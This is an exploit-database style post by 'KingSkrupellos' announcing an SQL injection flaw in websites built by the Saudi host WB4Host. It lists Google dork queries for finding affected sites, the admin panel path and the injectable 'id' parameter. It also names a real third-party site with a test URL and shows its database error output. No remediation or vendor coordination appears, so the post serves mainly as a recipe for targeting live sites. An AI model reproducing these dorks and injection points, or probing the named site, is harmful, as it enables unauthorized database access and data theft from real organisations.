facebook facebook twitter rss

WB4Host Saudi Arabia Hosting Company النطاق الواسع للاستضافة SQL Injection Vulnerability

Author: KingSkrupellos , Published: 16-11-2018
# Exploit Title : WB4Host Saudi Arabia Hosting Company  النطاق الواسع للاستضافة SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/11/2018
# Vendor Homepage : wb4host.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information :
# Google Dork :
intext:''النطاق الواسع للاستضافة'' site:sa
intext:''Design & developed by wb4host company'' site:sa
intext:''WB4HOST'' site:sa
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

/admin

#################################################################################################

# SQL Injection Exploit :

/en/index.php?content=more_project&id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

[+] fcc.com.sa/en/index.php?content=more_project&id=32%27 => [ Proof of Concept ] => archive.is/8a7fA

#################################################################################################

# SQL Database Error :

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/fcccom/public_html/en/index.php on line 115

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/fcccom/public_html/en/index.php on line 121

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :